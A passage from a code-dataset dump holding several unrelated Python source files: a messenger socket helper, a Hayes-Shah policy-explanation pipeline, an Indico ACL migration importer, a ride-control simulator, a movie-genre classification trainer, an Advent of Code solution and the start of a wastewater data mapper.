\"\"\"\n\n if isinstance(msg, dict):\n j_msg = dumps(msg)\n else:\n raise TypeError('Сообщение должно быть словарём.')\n\n b_msg = bytes(j_msg, 'utf-8')\n return sock.send(b_msg)\n","repo_name":"velimudrvelimudr/gb_messenger","sub_path":"common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"3085891287","text":"# Adapted from:\n#Author: Thomas Wagenaar (t.wagenaar@student.tue.nl)\n#\n# Implementation of the algorithms desribed in the paper \"Improving Robot\n# Controller Transparency Through Autonomous Policy Explanation\" by B. Hayes and\n# J.A. Shah.\n#Original Code Location: https://gitlab.tue.nl/ha800-hri/hayes-shah\n\n\n# Import libraries\nimport json\nimport hayes_shah.hs\nimport time\nimport UMNumber\nimport importlib\nimport operator\n\ndef generatePredicates(failedTask,numberOfAgents):\n isAgent1Apple2 = {\n 'true': 'Agent 1 picked apple 2',\n 'false': 'Agent 1 did not pick apple 2',\n 'verify': lambda s : s['Agent1Apple2'] == '1'}\n\n isAgent1Apple3 = {\n 'true': 'Agent 1 is picked apple 3',\n 'false': 'Agent 1 did not pick apple3',\n 'verify': lambda s : s['Agent1Apple3'] == '1'}\n\n isAgent1Apple1 = {\n 'true': 'Agent 1 picked apple 1',\n 'false': 'Agent 1 did not pick apple 1',\n 'verify': lambda s : s['Agent1Apple1'] == '1'}\n\n\n isAgent2Apple2 = {\n 'true': 'Agent 2 picked apple 2',\n 'false': 'Agent 2 did not picked apple 2',\n 'verify': lambda s : s['Agent2Apple2'] == '1'}\n\n isAgent2Apple3 = {\n 'true': 'Agent 2 picked apple 3',\n 'false': 'Agent 2 did not picked apple 3',\n 'verify': lambda s : s['Agent2Apple3'] == '1'}\n\n isAgent2Apple1 = {\n 'true': 'Agent 2 picked apple 1',\n 'false': 'Agent 2 did not picked apple 1',\n 'verify': lambda s : s['Agent2Apple1'] == '1'}\n\n\n isAgent3Apple2 = {\n 'true': 'Agent 3 picked apple 2',\n 'false': 'Agent 3 did not picked apple 2',\n 'verify': lambda s : s['Agent3Apple2'] == '1'}\n\n isAgent3Apple3 = {\n 'true': 'Agent 3 picked apple 3',\n 'false': 'Agent 3 did not picked apple 3',\n 'verify': lambda s : s['Agent3Apple3'] == '1'}\n\n isAgent3Apple1 = {\n 'true': 'Agent 3 picked apple 1',\n 'false': 'Agent 3 did not picked apple 1',\n 'verify': lambda s : s['Agent3Apple1'] == '1'}\n\n\n if numberOfAgents == 3:\n predicates = [isAgent1Apple2,isAgent2Apple2,isAgent3Apple2,isAgent1Apple3,isAgent2Apple3,isAgent3Apple3,isAgent1Apple1,isAgent2Apple1,isAgent3Apple1]\n\n return predicates\n\ndef taskFailure(targetState,numberOfAgents,failedTask):\n states = []\n actions = []\n one = []\n for i in UMNumber.UMNumberKeys:\n state = i.split(\",\")\n if numberOfAgents == 3:\n holdState = {'Agent1Apple2': '0', 'Agent2Apple2': '0', 'Agent3Apple2': '0','Agent1Apple3': '0', 'Agent2Apple3': '0', 'Agent3Apple3': '0','Agent1Apple1': '0', 'Agent2Apple1': '0', 'Agent3Apple1': '0'}\n if \"True\" in state[0]:\n holdState['Agent1Apple2'] = '1'\n if \"True\" in state[3]:\n holdState['Agent2Apple2'] = '1'\n if \"True\" in state[6]:\n holdState['Agent3Apple2'] = '1'\n if \"True\" in state[1]:\n holdState['Agent1Apple3'] = '1'\n if \"True\" in state[4]:\n holdState['Agent2Apple3'] = '1'\n if \"True\" in state[7]:\n holdState['Agent3Apple3'] = '1'\n if \"True\" in state[2]:\n holdState['Agent1Apple1'] = '1'\n if \"True\" in state[5]:\n holdState['Agent2Apple1'] = '1'\n if \"True\" in state[8]:\n holdState['Agent3Apple1'] = '1'\n states.append(holdState)\n actions.append({'go': 1.0})\n predicates = 
generatePredicates(\"apple2\",numberOfAgents)\n explainer = hayes_shah.hs.Explainer(states, actions, predicates);\n\n for s in targetState[failedTask]:\n state = s.split(\",\")\n if numberOfAgents == 3:\n holdState = {'Agent1Apple2': '0', 'Agent2Apple2': '0', 'Agent3Apple2': '0','Agent1Apple3': '0', 'Agent2Apple3': '0', 'Agent3Apple3': '0','Agent1Apple1': '0', 'Agent2Apple1': '0', 'Agent3Apple1': '0'}\n if \"True\" in state[0]:\n holdState['Agent1Apple2'] = '1'\n if \"True\" in state[3]:\n holdState['Agent2Apple2'] = '1'\n if \"True\" in state[6]:\n holdState['Agent3Apple2'] = '1'\n if \"True\" in state[1]:\n holdState['Agent1Apple3'] = '1'\n if \"True\" in state[4]:\n holdState['Agent2Apple3'] = '1'\n if \"True\" in state[7]:\n holdState['Agent3Apple3'] = '1'\n if \"True\" in state[2]:\n holdState['Agent1Apple1'] = '1'\n if \"True\" in state[5]:\n holdState['Agent2Apple1'] = '1'\n if \"True\" in state[8]:\n holdState['Agent3Apple1'] = '1'\n one.append(holdState)\n\n return explainer,one\n\n\ndef convertUserQuery(userQuery, failedTask):\n convertedQuery = ''\n timeStep = float('inf')\n completedTask = []\n for i in userQuery.keys():\n if failedTask in userQuery[i]:\n timeStep = userQuery[i].index(failedTask)\n\n for i in userQuery.keys():\n for j in range(0,timeStep+1):\n completedTask.append((int(i[-1]),userQuery[i][j]))\n\n if (1, 'apple2') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n if (2, 'apple2') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n if (3, 'apple2') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n\n if (1, 'apple3') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n if (2, 'apple3') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n if (3, 'apple3') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n\n if (1, 'apple1') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n if (2, 'apple1') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n if (3, 'apple1') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n\n return convertedQuery, timeStep\n\ndef updateUserQuery(userQuery,updatingQuery,failedTask,timeStep,numberOfAgents):\n taskMatch = {}\n agentMatch = {}\n\n for i in userQuery.keys():\n if userQuery[i][-1] != \"*\":\n lastTask = userQuery[i][-1]\n convertedUserQuery,_ = convertUserQuery(userQuery,lastTask)\n\n for i in userQuery.keys():\n for j in range(len(userQuery[i])):\n if userQuery[i][j] not in taskMatch.keys():\n taskMatch[userQuery[i][j]] = j\n taskMatch.pop(\"*\")\n\n agentMatch[\"apple2\"] = updatingQuery[0:3]\n agentMatch[\"apple3\"] = updatingQuery[3:6]\n agentMatch[\"apple1\"] = updatingQuery[6:9]\n\n for i in agentMatch.keys():\n if '1' in agentMatch[i] and i != failedTask:\n for k,v in taskMatch.items():\n if v >= taskMatch[i] + 1 and v != failedTask:\n taskMatch[k] += 1\n if taskMatch[i] + 1 > taskMatch[failedTask]:\n taskMatch[failedTask] = taskMatch[i] + 1\n elif \"1\" not in agentMatch[i] and i != failedTask and taskMatch[i] < taskMatch[failedTask]:\n taskMatch[failedTask] = taskMatch[i] - 1\n\n sorted_taskMatch = sorted(taskMatch.items(), 
key=operator.itemgetter(1))\n taskflag = False\n for k in sorted_taskMatch:\n if k[0] == 'apple2' and taskflag == True:\n agentMatch[k[0]] = convertedUserQuery[0:3]\n elif k[0] == 'apple3' and taskflag == True:\n agentMatch[k[0]] = convertedUserQuery[3:6]\n elif k[0] == 'apple1' and taskflag == True:\n agentMatch[k[0]] = convertedUserQuery[6:9]\n if k[0] == failedTask:\n taskflag = True\n\n sorted_taskMatch = sorted(taskMatch.items(), key=operator.itemgetter(1))\n\n for i in range(len(sorted_taskMatch)):\n task = sorted_taskMatch[i][0]\n agents = agentMatch[task]\n for j in range(len(agents)):\n if agents[j] == '1':\n userQuery[\"agent\"+str(j+1)][i] = task\n else:\n userQuery[\"agent\"+str(j+1)][i] = \"*\"\n\n return userQuery\n\n\ndef genNotPossExp(userQuery, numberOfAgents):\n importlib.reload(UMNumber)\n failedTasks = UMNumber.failedTasks\n targetState = UMNumber.targetState\n for failedTask in failedTasks:\n convertedQuery, timeStep = convertUserQuery(userQuery, \"apple2\")\n convertedQuery, timeStep = convertUserQuery(userQuery, failedTask)\n print(failedTask+\":\")\n explainer,one = taskFailure(targetState,numberOfAgents,failedTask)\n clauses,bestMinterm = explainer.getLanguage(one, convertedQuery,'pick apple',timeStep,numberOfAgents)\n print(clauses)\n userQuery = updateUserQuery(userQuery,bestMinterm,failedTask,timeStep,numberOfAgents)\n print(\"\")\n return userQuery\n\ndef main():\n numberOfAgents = 3\n userQuery = {\"agent1\": [\"*\",\"*\",\"apple2\"], #Not Possible Query\n \"agent2\":[\"apple3\",\"*\",\"apple2\"],\n \"agent3\":[\"apple3\",\"apple1\",\"*\"]}\n #genNotPossExp(userQuery, numberOfAgents)\nmain()\n","repo_name":"kjboggess/ijcai23","sub_path":"LBF Code Pipeline/Code Pipeline/RE_generateNotPossExp_3agTotalQ.py","file_name":"RE_generateNotPossExp_3agTotalQ.py","file_ext":"py","file_size_in_byte":9296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"19619914381","text":"from __future__ import unicode_literals\n\nfrom math import ceil\nfrom operator import attrgetter\n\nimport click\nfrom sqlalchemy.orm import joinedload\n\nfrom indico.core.db.sqlalchemy.protection import ProtectionMode\nfrom indico.core.db.sqlalchemy.util.session import no_autoflush\nfrom indico.modules.events import Event\nfrom indico.modules.networks.models.networks import IPNetworkGroup\nfrom indico.modules.users import User\nfrom indico.util.console import verbose_iterator, cformat\nfrom indico.util.struct.iterables import committing_iterator\nfrom indico_zodbimport import Importer\nfrom indico_zodbimport.util import patch_default_group_provider, convert_principal, convert_to_unicode\n\n\nclass EventACLImporter(Importer):\n def __init__(self, **kwargs):\n self.default_group_provider = kwargs.pop('default_group_provider')\n self.parallel = kwargs.pop('parallel')\n self.all_users_by_email = {}\n self.domains_map = {}\n super(EventACLImporter, self).__init__(**kwargs)\n\n @staticmethod\n def decorate_command(command):\n def _process_parallel(ctx, param, value):\n if value is None:\n return None\n n, i = map(int, value.split(':', 1))\n if n <= 1:\n raise click.BadParameter('N must be >1')\n if i not in range(n):\n raise click.BadParameter('I must be in [0..{})'.format(n))\n return n, i\n\n command = click.option('--default-group-provider', required=True,\n help=\"Name of the default group provider\")(command)\n command = click.option('-P', '--parallel', metavar='N:I', callback=_process_parallel,\n help='Parallel mode - migrates only events 
with `ID mod N = I`. '\n                                    'When using this, you need to run the script N times with '\n                                    'I being in [0..N)')(command)\n        return command\n\n    @no_autoflush\n    def migrate(self):\n        self.domains_map = {ipng.name.lower(): ipng for ipng in IPNetworkGroup.query}\n        all_users_query = User.query.options(joinedload('_all_emails')).filter_by(is_deleted=False)\n        for user in all_users_query:\n            for email in user.all_emails:\n                self.all_users_by_email[email] = user\n\n        with patch_default_group_provider(self.default_group_provider):\n            self.migrate_event_acls()\n\n    def migrate_event_acls(self):\n        self.print_step('migrating event ACLs')\n        protection_mode_map = {-1: ProtectionMode.public, 0: ProtectionMode.inheriting, 1: ProtectionMode.protected}\n        for legacy_event, event in committing_iterator(self._iter_events(), 5000):\n            ac = legacy_event._Conference__ac\n            self.print_success('', event_id=event.id)\n\n            old_protection_mode = protection_mode_map[ac._accessProtection]\n            if old_protection_mode == ProtectionMode.public and ac.requiredDomains:\n                event.protection_mode = ProtectionMode.protected\n                self._migrate_domains(event, ac.requiredDomains)\n            else:\n                event.protection_mode = old_protection_mode\n\n            no_access_contact = convert_to_unicode(getattr(ac, 'contactInfo', ''))\n            if no_access_contact != 'no contact info defined':\n                event.own_no_access_contact = no_access_contact\n            event.access_key = convert_to_unicode(getattr(legacy_event, '_accessKey', ''))\n            if not self.quiet:\n                self.print_success('Protection mode set to {}'.format(event.protection_mode.name), event_id=event.id)\n            for legacy_acl in ac.allowed:\n                event_acl = self.convert_acl(legacy_acl)\n                if event_acl is None:\n                    self.print_warning(cformat('%{red}ACL%{reset}%{yellow} does not exist:%{reset} {}')\n                                       .format(legacy_acl), event_id=event.id)\n                    continue\n                event.update_principal(event_acl, read_access=True, quiet=True)\n                if not self.quiet:\n                    self.print_msg(cformat('%{green}[{}]%{reset} {}').format('Event ACL', event_acl))\n\n    def _migrate_domains(self, event, old_domains):\n        for old_domain in old_domains:\n            network = self.domains_map[convert_to_unicode(old_domain.name).lower()]\n            event.update_principal(network, read_access=True, quiet=True)\n            if not self.quiet:\n                self.print_success('Adding {} IPNetworkGroup to the ACLs'.format(network), event_id=event.id)\n\n    def convert_acl(self, old_acl):\n        acl = convert_principal(old_acl)\n        if (acl is None and old_acl.__class__.__name__ in ('Avatar', 'AvatarUserWrapper') and\n                'email' in old_acl.__dict__):\n            email = old_acl.__dict__['email'].lower()\n            acl = self.all_users_by_email.get(email)\n            if acl is not None:\n                self.print_warning('Using {} for {} (matched via {})'.format(acl, old_acl, email), always=False)\n        return acl\n\n    def _iter_events(self):\n        event_it = self.zodb_root['conferences'].itervalues()\n        events_query = Event.find(is_deleted=False).order_by(Event.id)\n        event_total = len(self.zodb_root['conferences'])\n        if self.parallel:\n            n, i = self.parallel\n            event_it = (e for e in event_it if int(e.id) % n == i)\n            event_total = int(ceil(event_total / n))\n            events_query = events_query.filter(Event.id % n == i)\n        all_events = {ev.id: ev for ev in events_query}\n        if self.quiet:\n            event_it = verbose_iterator(event_it, event_total, attrgetter('id'), attrgetter('title'))\n        for conf in self.flushing_iterator(event_it):\n            event = all_events.get(int(conf.id))\n            if event is None:\n                self.print_error(cformat('%{red!}Event not found in DB'), event_id=conf.id)\n                continue\n            yield conf, 
event\n","repo_name":"emolenaar/indico","sub_path":"indico_zodbimport/modules/event_acls.py","file_name":"event_acls.py","file_ext":"py","file_size_in_byte":6002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"50"} +{"seq_id":"26906634803","text":"\r\nfrom estop import top, estoping, shortclock\r\nfrom Errors import E300, E550, E400\r\nimport ridemusic\r\nfrom Shutdown import shutdown\r\nimport winsound\r\nimport constants\r\nimport time\r\n\r\ndef resetride():\r\n print(\"\")\r\n ##Reset all looping values to defalt\r\n\r\ndef printsongs():\r\n top()\r\n print(ridemusic.song1n)\r\n print(ridemusic.song2n)\r\n print(ridemusic.song3n)\r\n print(ridemusic.song5n)\r\n print(ridemusic.song6n)\r\n\r\ndef manualmodeen():\r\n\r\n ##Starting values\r\n totalrideload = 0\r\n gyro = True\r\n ridetimer = 5\r\n\r\n riderunning = True\r\n restraintcheck = True\r\n musicq = input(\"Would you like onboard music (y/n): \")\r\n if(musicq == \"y\"):\r\n music = True\r\n elif(musicq == \"n\"):\r\n music = False\r\n elif(musicq == \"4\"):\r\n estoping()\r\n quit()\r\n else:\r\n E300()\r\n quit()\r\n top()\r\n riderunning = True\r\n while(riderunning == True):\r\n resetride()\r\n while(restraintcheck == True):\r\n if(music == True):\r\n printsongs()\r\n musicc = input('Please select music choice (1-2-3-5-6):')\r\n top()\r\n if(musicc == \"1\"):\r\n ridemusic.song1()\r\n elif(musicc == \"2\"):\r\n ridemusic.song2()\r\n elif(musicc == \"3\"):\r\n ridemusic.song3()\r\n elif(musicc == \"5\"):\r\n ridemusic.song5()\r\n elif(musicc == \"6\"):\r\n ridemusic.song6()\r\n elif(musicc == \"4\"):\r\n estoping()\r\n break\r\n riderweight = input(\"Input rider weight:\")\r\n top()\r\n restraints = input(\"Verify Restraints: Press to continue\")\r\n top()\r\n if(restraints == \"5\"):\r\n top()\r\n print(\"Restraints Locked: GREEN to Dispatch\")\r\n restraintcheck = False\r\n elif(restraints == \"4\"):\r\n estoping()\r\n break\r\n elif(restraints ==\"take5\"):\r\n shutdown()\r\n quit()\r\n else:\r\n E300()\r\n break\r\n dispatch1 = input(\"\")\r\n top()\r\n if(dispatch1 == \"31\"):\r\n riderweightint = int(riderweight)\r\n if(constants.maxriderweight >= riderweightint):\r\n print\r\n else:\r\n E550()\r\n estoping()\r\n quit()\r\n if(totalrideload >= constants.allowrideload):\r\n E400()\r\n estoping()\r\n quit()\r\n print(\"## Ride Running\")\r\n restraintcheck = True\r\n while(gyro == True ) and (ridetimer > 0):\r\n print(\"DATA GO\")\r\n time.sleep(1)\r\n ridetimer -= 1\r\n\r\n\r\n\r\n\r\n print(\"##Ride over\")\r\n totalrideload += riderweightint\r\n shortclock()\r\n winsound.PlaySound(None, winsound.SND_PURGE)\r\n top()\r\n elif(dispatch1 == \"4\"):\r\n estoping()\r\n break\r\n elif(dispatch1 == \"y\"):\r\n top()\r\n riderunning = False\r\n else: \r\n E300()\r\n break","repo_name":"EvanOdya/GLCOS","sub_path":"T-25 2.0.0/Manual.py","file_name":"Manual.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"3111360096","text":"import json\nimport logging\nimport time\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom utils import evaluate, setup_logging, setup_seed, setup_device, build_optimizer, build_optimizer_vlbert\nimport tempfile\nfrom sklearn.model_selection import KFold\n\nfrom config import parse_args\nfrom data_helper import create_dataloader, create_dataloader_all\nfrom models.CTT_base1.model import Base1CttMmc\nfrom models.GMU_base2.model import GMU_MGC\nfrom 
models.base3.model import Base3Moviescope\nfrom models.MFMGC.model import MFMGC\nfrom models.base4.model import Base4\nfrom models.base5.model import Base5\nfrom models.base6.model import Base6\n\n\ndef validation(model, val_dataloader):\n    model.eval()\n    losses = []\n    predictions_01 = []\n    raw_predictions = []\n    labels = []\n    hidden_matrix = []\n    with torch.no_grad():\n        t_begin = time.time()\n        for step, batch in enumerate(val_dataloader):\n            loss, accuracy, pred_label_id, raw_prediction, hidden = model(batch)\n\n            loss = loss.mean()\n            accuracy = accuracy.mean()\n            predictions_01.extend(pred_label_id.cpu().numpy())\n            raw_predictions.extend(raw_prediction.cpu().numpy())\n            labels.extend(batch['label'].cpu().numpy())\n            # hidden_matrix.extend(hidden.cpu().numpy())\n            losses.append(loss)\n            if step % 5 == 0:\n                t = time.time()\n                logging.info(f\"step={step:4}/{len(val_dataloader)}|\"\n                             f\"loss={loss:6.4}|acc={accuracy:0.4}|time={t - t_begin:.4}s\")\n                t_begin = time.time()\n\n    loss = sum(losses) / len(losses)\n    metrics = evaluate(predictions_01, labels, raw_predictions)\n    return loss, metrics, hidden_matrix\n\n\ndef test_model(args, test_dataloader, model_save, dataloader):\n    logging.info('>>> loading model...')\n    if args.model_name == 'base1':\n        model = Base1CttMmc(args)\n    elif args.model_name == 'mymodel':\n        model = MFMGC(args)\n    elif args.model_name == 'base2':\n        model = GMU_MGC(args)\n    elif args.model_name == 'base3':\n        model = Base3Moviescope(args)\n    elif args.model_name == 'base4':\n        model = Base4(args)\n    elif args.model_name == 'base5':\n        model = Base5(args)\n    elif args.model_name == 'base6':\n        model = Base6(args)\n    model_save.seek(0)\n    model_dict = torch.load(model_save, map_location='cpu')\n    model.load_state_dict(model_dict[0])\n    \n    if args.device == 'cuda':\n        model = torch.nn.parallel.DataParallel(model.to(args.device))\n        print('>> using gpu to load model...')\n    \n    val_loss, metrics, _ = validation(model, test_dataloader)\n    logging.info(f\">>> val_loss: {val_loss}, metrics: {metrics}\")\n    hidden_matrix = []\n    if args.model_name == 'base6':\n        with torch.no_grad():\n            for step, batch in enumerate(dataloader):\n                loss, accuracy, pred_label_id, raw_prediction, hidden = model(batch)\n                hidden_matrix.extend(hidden.cpu().numpy())\n\n        hidden_matrix = pd.DataFrame(hidden_matrix)\n        print(hidden_matrix.shape)\n        hidden_matrix.to_csv('./' + args.modals[0] + '-features-mb.csv', header=False, index=False)\n    return metrics\n\n\ndef train_and_validation(args):\n    skf = KFold(n_splits=5, random_state=42, shuffle=True)\n    labels = pd.read_csv(args.label_path, header=None, index_col=None).values\n    args.data_num = len(labels)\n    note_log = dict(\n        note='-'.join(args.modals),  # args.note,\n        best_epoch=[0 for _ in range(5)],\n        macro=[],\n        micro=[],\n        weighted_f1=[],\n        auc_pr_macro=[],\n        auc_pr_micro=[],\n        auc_macro=[],\n        auc_micro=[],\n    )\n    for i, (train_val_index, test_index) in enumerate(skf.split(range(args.data_num), labels)):\n        if i != 0:\n            continue\n        print('==================== %d fold ====================' % i)\n        train_index = train_val_index[: int(len(train_val_index) * 7 / 8)]\n        val_index = train_val_index[int(len(train_val_index) * 7 / 8):]\n        # train_index, val_index, test_index = None, None, None\n        train_dataloader, val_dataloader, test_dataloader, _, _, _ = create_dataloader(args, train_index, val_index, test_index)\n        dataloader = create_dataloader_all(args)\n        if args.model_name == 'base1':\n            model = Base1CttMmc(args)\n            optimizer, schedual = build_optimizer(args, model)\n        elif args.model_name == 
'mymodel':\n            model = MFMGC(args)\n            optimizer, schedual = build_optimizer_vlbert(args, model)\n        elif args.model_name == 'base2':\n            model = GMU_MGC(args)\n            optimizer, schedual = build_optimizer(args, model)\n        elif args.model_name == 'base3':\n            model = Base3Moviescope(args)\n            optimizer, schedual = build_optimizer(args, model)\n        elif args.model_name == 'base4':\n            model = Base4(args)\n            optimizer, schedual = build_optimizer(args, model)\n        elif args.model_name == 'base5':\n            model = Base5(args)\n            optimizer, schedual = build_optimizer(args, model)\n        elif args.model_name == 'base6':\n            model = Base6(args)\n            optimizer, schedual = build_optimizer(args, model)\n\n        # model_dict = torch.load('./models/CCT_MMC_base1/save/model.bin', map_location='cpu')\n        # model.load_state_dict(model_dict['model_state_dict'])\n        if args.device == 'cuda':\n            model = torch.nn.parallel.DataParallel(model.to(args.device))\n            print('>> using gpu to load model...')\n\n        micro_begin = 0.0\n        no_decay_epoch = 0\n\n        logging.info('>>> begin training...')\n        model_save = tempfile.TemporaryFile()\n        for epoch in range(100):\n            t_begin = time.time()\n            t_log = t_begin\n            train_loss = []\n            for step, batch in enumerate(train_dataloader):\n                model.train()\n                optimizer.zero_grad()\n\n                loss, accuracy, _, _, _ = model(batch)\n                loss = loss.mean()\n                accuracy = accuracy.mean()\n                loss.backward()\n\n                optimizer.step()\n                if args.model_name == 'mymodel':\n                    schedual.step()\n\n                train_loss.append(loss)\n\n                elap_t = time.time() - t_begin\n                if step == 2 or step and step % 10 == 0:\n                    lr = optimizer.param_groups[0]['lr']\n                    logging.info(f\"Epoch={epoch + 1}|step={step:4}/{len(train_dataloader)}|\"\n                                 f\"loss={loss:6.4}|lr={lr:0.8}|acc={accuracy:0.4}|time={elap_t:.4}s\")\n                    t_begin = time.time()\n\n            logging.info(f\"train_loss={sum(train_loss) / len(train_loss):.4}\")\n            # validation\n            logging.info('>>> begin validation...')\n            val_loss, metrics, _ = validation(model, val_dataloader)\n            logging.info(f\">>> val_loss: {val_loss}, metrics: {metrics}\")\n            micro_f1 = metrics['micro_f1']\n\n            if micro_f1 - micro_begin > 0.001:\n                micro_begin = micro_f1\n                no_decay_epoch = 0\n                logging.info('>> model saving...')\n                model_save.close()\n                model_save = tempfile.TemporaryFile()\n                dict_list = [model.module.state_dict()]  #\n                torch.save(dict_list, model_save)\n                note_log['best_epoch'][i] = epoch\n            else:\n                no_decay_epoch += 1\n                if no_decay_epoch >= args.early_stop_epoch:\n                    logging.info('the micro_f1 has not increased over %d epochs, STOP Training!' 
% args.early_stop_epoch)\n                    break\n\n        # start testing\n        logging.info('==========================================================')\n        logging.info('>>> begin testing...')\n        metrics = test_model(args, test_dataloader, model_save, dataloader)\n        note_log['macro'].append(metrics['macro_f1'])\n        note_log['micro'].append(metrics['micro_f1'])\n        note_log['weighted_f1'].append(metrics['weighted_f1'])\n        note_log['auc_pr_macro'].append(metrics['auc_pr_macro'])\n        note_log['auc_pr_micro'].append(metrics['auc_pr_micro'])\n        note_log['auc_macro'].append(metrics['auc_macro'])\n        note_log['auc_micro'].append(metrics['auc_micro'])\n\n    result = 'macro: %.4f|micro: %.4f|weighted: %.4f|auc_pr_macro:%.4f|auc_pr_micro:%.4f|auc_macro:%.4f|auc_micro:%.4f' % \\\n             (np.array(note_log['macro']).mean(),\n              np.array(note_log['micro']).mean(),\n              np.array(note_log['weighted_f1']).mean(),\n              np.array(note_log['auc_pr_macro']).mean(),\n              np.array(note_log['auc_pr_micro']).mean(),\n              np.array(note_log['auc_macro']).mean(),\n              np.array(note_log['auc_micro']).mean())\n    # save the logs\n    if args.dataset_name == 'moviebricks':\n        result_save_path = './moviebricks.json'\n    else:\n        result_save_path = './moviescope.json'\n    with open(result_save_path, 'a+', encoding='utf-8') as f:\n        json.dump(note_log, f)\n        f.write('\\n')\n        f.write(result)\n        f.write('\\n')\n    print('======result=====', result)\n\n\ndef rewrite_args(args, root):\n    args.annotation = root + args.annotation\n    args.graph_path = root + args.graph_path\n    args.pic_video_path = root + args.pic_video_path\n    args.poster_pic_path = root + args.poster_pic_path\n    args.audio_feature_path = root + args.audio_feature_path\n    args.label_path = root + args.label_path\n    args.poster_feature_path = root + args.poster_feature_path\n    args.word2vec_path = root + args.word2vec_path\n\n\nif __name__ == '__main__':\n    args = parse_args()\n    if args.dataset_name == 'moviebricks':\n        root = './data/'\n    elif args.dataset_name == 'moviescope':\n        root = './data-moviescope/'\n    else:\n        root = ''\n    setup_seed(args)\n    setup_device(args)\n    setup_logging(args.model_name + '_' + args.ablation)\n    logging.info(\"Training/evaluation parameters: %s\", args)\n    rewrite_args(args, root)\n\n    if root == './data/':\n        cls_freqs = {'动作': 744, '惊悚': 861, '冒险': 579, '剧情': 2244, '科幻': 403, '爱情': 591, '奇幻': 337, '喜剧': 1189, '恐怖': 414, '犯罪': 496}\n        movie_num = 4063\n        cls_weight = torch.FloatTensor([int(v) / movie_num for v in cls_freqs.values()]) ** -1\n    else:\n        cls_freqs = [953, 200, 237, 1556, 731, 2114, 461, 760, 451, 415, 910, 494, 1181]\n        movie_num = 4076\n        cls_weight = torch.FloatTensor([int(v) / movie_num for v in cls_freqs]) ** -1\n    args.cls_num = len(cls_freqs)\n    args.bert_dir = 'roberta-base'\n    args.pretrain_model_lr = 5e-6\n    args.warmup_steps = 200  # 6000\n    args.bert_cache = './models/cache/bert'\n    args.word2vec_path = './data-moviescope/word2vec/GoogleNews-vectors-negative300.bin.gz'\n\n    print(cls_weight)\n    args.cls_weight = cls_weight\n    \n    train_and_validation(args)\n","repo_name":"lucyyangrui/MFMGC","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"24392348290","text":"import sys\n\njoltages = [0]\nwith open(sys.argv[1]) as file:\n    for line in file:\n        joltages.append(int(line))\njoltages.append(max(joltages) + 3)\n\njoltages.sort()\ndifferences = list(map(lambda a, b: b-a, joltages[:-1], joltages[1:]))\nprint(differences.count(1) * 
differences.count(3))\n","repo_name":"snaily/adventofcode2020","sub_path":"10a.py","file_name":"10a.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"16380242393","text":"import os\nimport re\nimport warnings\nfrom datetime import datetime\nfrom typing import Literal\n\nimport numpy as np\nimport pandas as pd\n\nfrom wbe_odm import utilities\nfrom wbe_odm.odm_mappers import excel_template_mapper\nfrom wbe_odm.odm_mappers.csv_mapper import CsvMapper\n\nLABEL_REGEX = r\"[a-zA-Z]+_[0-9]+(\\.[0-9])?_[a-zA-Z0-9]+_[a-zA-Z0-9]+\"\n\ndirectory = os.path.dirname(__file__)\n\nMCGILL_MAP_2021 = f\"{directory}/mcgill_map.csv\"\nMCGILL_MAP_2022 = f\"{directory}/mcgill_map_2022.csv\"\n\nLETTERS = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\n\nclass MapperFuncs:\n    @classmethod\n    def parse_date(cls, item, format=\"%Y-%m-%d\"):\n        date = pd.NaT\n        try:\n            date = pd.to_datetime(item, format=format)\n        except TypeError:\n            pass\n        return date\n\n    @classmethod\n    def clean_up(cls, df, molecular_cols, meas_cols, date_format):\n        # remove rows that aren't samples\n        type_col = \"sampling.general information.type sample.na\"\n        df = df.loc[~df[type_col].isin([\"Reference\", \"Negative\"])]\n\n        df.loc[:, molecular_cols + meas_cols] = df.loc[\n            :, molecular_cols + meas_cols\n        ].apply(pd.to_numeric, errors=\"coerce\")\n\n        df = df.dropna(subset=molecular_cols, how=\"all\")\n        # Parse other measurement columns:\n        # we need to convert resistivity to conductivity\n        cond_col = \"concentration.key parametres.conductivity megohm.na\"\n        df[cond_col] = df[cond_col].apply(\n            lambda x: 1 / x if str(x).isnumeric() else np.nan\n        )\n        # Parse date columns to datetime\n        for col in df.columns:\n            if \"date\" in col:\n                df[col] = df[col].apply(lambda x: cls.parse_date(x, date_format))\n        return df\n\n    @classmethod\n    def clean_labels(cls, label):\n        parts = str(label).lower().split(\"_\")\n        parts = [part.strip() for part in parts]\n        return \"_\".join(parts)\n\n    @classmethod\n    def get_sample_type(cls, sample_type):\n        \"\"\"acceptable_types = [\n            \"qtips\", \"filter\", \"gauze\",\n            \"swrsed\", \"pstgrit\", \"psludge\",\n            \"pefflu\", \"ssludge\", \"sefflu\",\n            \"water\", \"faeces\", \"rawww\", \"\"\n        ]\"\"\"\n        sample_type = sample_type.str.strip().str.lower()\n        return sample_type\n\n    @classmethod\n    def get_start_date(cls, start_col, end_col, 